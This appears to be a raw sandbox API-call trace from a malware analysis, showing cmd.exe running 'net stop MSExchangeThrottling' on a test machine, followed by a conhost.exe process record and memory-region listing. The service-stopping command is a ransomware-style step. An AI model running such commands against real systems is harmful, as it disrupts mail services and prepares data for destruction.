[0141.158] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0141.158] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0141.158] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0141.158] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0141.158] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0141.158] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0141.159] GetEnvironmentStringsW () returned 0x4b67d78* [0141.159] FreeEnvironmentStringsA (penv="A") returned 1 [0141.159] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.159] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.159] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0141.159] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0141.159] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0141.159] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0141.159] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0141.159] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0141.159] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0141.159] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0141.159] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x488f538 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0141.159] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x488f538, lpFilePart=0x488f530 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x488f530*="Desktop") returned 0x1d [0141.159] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0141.159] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x488f2b8 | out: lpFindFileData=0x488f2b8) returned 0x4b605c8 [0141.159] FindClose (in: hFindFile=0x4b605c8 | out: hFindFile=0x4b605c8) returned 1 [0141.159] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x488f2b8 | out: lpFindFileData=0x488f2b8) returned 0x4b605c8 [0141.159] FindClose (in: hFindFile=0x4b605c8 | out: hFindFile=0x4b605c8) returned 1 [0141.159] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0141.160] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x488f2b8 | out: lpFindFileData=0x488f2b8) returned 0x4b605c8 [0141.160] FindClose (in: hFindFile=0x4b605c8 | out: hFindFile=0x4b605c8) returned 1 [0141.160] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0141.160] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0141.160] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0141.160] GetEnvironmentStringsW () returned 0x4b67d78* [0141.160] FreeEnvironmentStringsA (penv="=") returned 1 [0141.160] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0141.160] GetConsoleOutputCP () returned 0x1b5 [0141.160] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0141.161] GetUserDefaultLCID () returned 0x409 [0141.161] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0141.161] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x488f668, cchData=128 | out: lpLCData="0") returned 2 [0141.161] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x488f668, cchData=128 | out: lpLCData="0") returned 2 [0141.161] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x488f668, cchData=128 | out: lpLCData="1") returned 2 [0141.161] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0141.161] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0141.161] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0141.161] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0141.161] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0141.161] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0141.161] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0141.161] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0141.161] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0141.161] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0141.161] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0141.162] GetConsoleTitleW (in: lpConsoleTitle=0x4b6a9f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.162] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0141.162] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0141.162] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0141.162] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0141.163] _wcsicmp (_String1="net", _String2=")") returned 69 [0141.163] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0141.163] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0141.163] _wcsicmp (_String1="IF", _String2="net") returned -5 [0141.163] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0141.163] _wcsicmp (_String1="REM", _String2="net") returned 4 [0141.163] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0141.163] GetConsoleTitleW (in: lpConsoleTitle=0x488f350, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.164] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0141.164] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0141.164] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0141.164] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0141.164] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0141.164] _wcsicmp (_String1="net", _String2="CD") returned 11 [0141.164] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0141.164] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0141.164] _wcsicmp (_String1="net", _String2="REN") returned -4 [0141.164] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0141.164] _wcsicmp (_String1="net", _String2="SET") returned -5 [0141.164] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0141.164] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0141.164] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0141.164] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0141.164] _wcsicmp (_String1="net", _String2="MD") returned 1 [0141.164] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0141.164] _wcsicmp (_String1="net", _String2="RD") returned -4 [0141.164] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0141.164] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0141.164] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0141.164] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0141.164] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0141.164] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0141.164] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0141.164] _wcsicmp (_String1="net", _String2="VER") returned -8 [0141.164] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0141.164] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0141.164] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0141.164] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0141.164] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0141.164] _wcsicmp (_String1="net", _String2="START") returned -5 [0141.164] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0141.164] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0141.164] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0141.164] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0141.164] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0141.164] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0141.164] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0141.164] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0141.164] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0141.164] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0141.164] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0141.164] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0141.165] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0141.165] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0141.165] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0141.165] _wcsicmp (_String1="net", _String2="CD") returned 11 [0141.165] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0141.165] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0141.165] _wcsicmp (_String1="net", _String2="REN") returned -4 [0141.165] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0141.165] _wcsicmp (_String1="net", _String2="SET") returned -5 [0141.165] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0141.165] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0141.165] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0141.165] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0141.165] _wcsicmp (_String1="net", _String2="MD") returned 1 [0141.165] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0141.165] _wcsicmp (_String1="net", _String2="RD") returned -4 [0141.165] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0141.165] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0141.165] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0141.165] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0141.165] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0141.165] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0141.165] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0141.165] _wcsicmp (_String1="net", _String2="VER") returned -8 [0141.165] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0141.165] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0141.165] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0141.165] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0141.165] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0141.165] _wcsicmp (_String1="net", _String2="START") returned -5 [0141.165] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0141.165] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0141.165] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0141.165] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0141.165] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0141.165] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0141.165] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0141.165] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0141.165] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0141.165] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0141.165] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0141.165] _wcsicmp (_String1="net", _String2="IF") returned 5 [0141.165] _wcsicmp (_String1="net", _String2="REM") returned -4 [0141.165] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0141.166] SetErrorMode (uMode=0x0) returned 0x0 [0141.166] SetErrorMode (uMode=0x1) returned 0x0 [0141.166] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4b605d0, lpFilePart=0x488ee5c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x488ee5c*="Desktop") returned 0x1d [0141.166] SetErrorMode (uMode=0x0) returned 0x1 [0141.166] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0141.166] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0141.173] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0141.173] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0141.173] GetConsoleTitleW (in: lpConsoleTitle=0x488f0dc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.174] InitializeProcThreadAttributeList (in: lpAttributeList=0x488f008, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x488efec | out: lpAttributeList=0x488f008, lpSize=0x488efec) returned 1 [0141.174] UpdateProcThreadAttribute (in: lpAttributeList=0x488f008, dwFlags=0x0, Attribute=0x60001, lpValue=0x488eff4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x488f008, lpPreviousValue=0x0) returned 1 [0141.174] GetStartupInfoW (in: lpStartupInfo=0x488f040 | out: lpStartupInfo=0x488f040*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0141.174] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0141.174] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0141.174] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0141.174] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0141.174] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0141.174] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0141.174] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0141.174] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0141.174] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0141.174] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0141.174] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0141.174] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0141.174] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0141.174] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0141.174] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0141.174] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0141.174] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0141.174] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.174] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.174] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.174] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.174] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.174] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0141.174] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0141.174] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0141.174] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0141.174] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0141.174] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0141.174] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0141.174] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0141.174] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0141.174] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0141.174] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0141.174] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0141.174] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0141.174] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0141.174] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0141.174] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0141.174] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0141.175] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSExchangeThrottling", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x488ef90*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSExchangeThrottling", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x488efdc | out: lpCommandLine="net stop MSExchangeThrottling", lpProcessInformation=0x488efdc*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xd90, dwThreadId=0x5c0)) returned 1 [0141.182] CloseHandle (hObject=0xa4) returned 1 [0141.182] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0141.182] GetEnvironmentStringsW () returned 0x4b69ee0* [0141.182] FreeEnvironmentStringsA (penv="=") returned 1 [0141.182] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0141.421] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x488ef74 | out: lpExitCode=0x488ef74*=0x2) returned 1 [0141.421] CloseHandle (hObject=0xa8) returned 1 [0141.421] _vsnwprintf (in: _Buffer=0x488f05c, _BufferCount=0x13, _Format="%08X", _ArgList=0x488ef7c | out: _Buffer="00000002") returned 8 [0141.421] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0141.421] GetEnvironmentStringsW () returned 0x4b67d78* [0141.421] FreeEnvironmentStringsA (penv="=") returned 1 [0141.421] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0141.421] GetEnvironmentStringsW () returned 0x4b67d78* [0141.421] FreeEnvironmentStringsA (penv="=") returned 1 [0141.421] DeleteProcThreadAttributeList (in: lpAttributeList=0x488f008 | out: lpAttributeList=0x488f008) [0141.421] _get_osfhandle (_FileHandle=1) returned 0x3c [0141.421] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0141.422] _get_osfhandle (_FileHandle=1) returned 0x3c [0141.422] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0141.422] _get_osfhandle (_FileHandle=0) returned 0x38 [0141.422] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0141.422] SetConsoleInputExeNameW () returned 0x1 [0141.422] GetConsoleOutputCP () returned 0x1b5 [0141.422] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0141.422] SetThreadUILanguage (LangId=0x0) returned 0x409 [0141.422] exit (_Code=2) Thread: id = 762 os_tid = 0x300 Process: id = "262" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x16153000" os_pid = "0xd48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "261" os_parent_pid = "0x764" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12450 start_va = 0x7fc1b000 end_va = 0x7fc1bfff entry_point = 0x0 region_type = private name = "private_0x000000007fc1b000" filename = "" Region: id = 12451 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12452 start_va = 0x115c010000 end_va = 0x115c02ffff entry_point = 0x0 region_type = private name = "private_0x000000115c010000" filename = "" Region: id = 12453 start_va = 0x115c030000 end_va = 0x115c043fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000115c030000" filename = "" Region: id = 12454 start_va = 0x115c050000 end_va = 0x115c08ffff entry_point = 0x0 region_type = private name = "private_0x000000115c050000" filename = "" Region: id = 12455 start_va = 0x7df5ffb50000 end_va = 0x7ff5ffb4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffb50000" filename = "" Region: id = 12456 start_va = 0x7ff6c3a10000 end_va = 0x7ff6c3a32fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3a10000" filename = "" Region: id = 12457 start_va = 0x7ff6c3a36000 end_va = 0x7ff6c3a36fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3a36000" filename = "" Region: id = 12458 start_va = 0x7ff6c3a3e000 end_va = 0x7ff6c3a3ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3a3e000" filename = "" Region: id = 12459 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 12460 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12461 start_va = 0x115c010000 end_va = 0x115c01ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000115c010000" filename = "" Region: id = 12462 start_va = 0x115c020000 end_va = 0x115c026fff entry_point = 0x0 region_type = private name = "private_0x000000115c020000" filename = "" Region: id = 12463 start_va = 0x115c090000 end_va = 0x115c0cffff entry_point = 0x0 region_type = private name = "private_0x000000115c090000" filename = "" Region: id = 12464 start_va = 0x115c0d0000 end_va = 0x115c0d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000115c0d0000" filename = "" Region: id = 12465 start_va = 0x115c0e0000 end_va = 0x115c0e6fff entry_point = 0x0 region_type = private name = "private_0x000000115c0e0000" filename = "" Region: id = 12466 start_va = 0x115c0f0000 end_va = 0x115c0f0fff entry_point = 0x0 region_type = private name = "private_0x000000115c0f0000" filename = "" Region: id = 12467 start_va = 0x115c100000 end_va = 0x115c100fff entry_point = 0x0 region_type = private name = "private_0x000000115c100000" filename = "" Region: id = 12468 start_va = 0x115c120000 end_va = 0x115c21ffff entry_point = 0x0 region_type = private name = "private_0x000000115c120000" filename = "" Region: id = 12469 start_va = 0x115c220000 end_va = 0x115c2ddfff entry_point = 0x115c220000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12470 start_va = 0x115c400000 end_va = 0x115c40ffff entry_point = 0x0 region_type = private name = "private_0x000000115c400000" filename = "" Region: id = 12471 start_va = 0x115c410000 end_va = 0x115c597fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000115c410000" filename = "" Region: id = 12472 start_va = 0x115c5a0000 end_va = 0x115c720fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000115c5a0000" filename = "" Region: id = 12473 start_va = 0x115c730000 end_va = 0x115db2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000115c730000" filename = "" Region: id = 12474 start_va = 0x7ff6c3910000 end_va = 0x7ff6c3a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3910000" filename = "" Region: id = 12475 start_va = 0x7ff6c3a3c000 end_va = 0x7ff6c3a3dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3a3c000" filename = "" Region: id = 12476 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 12477 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 12478 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12479 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 12480 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 12481 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 12482 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 12483 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" 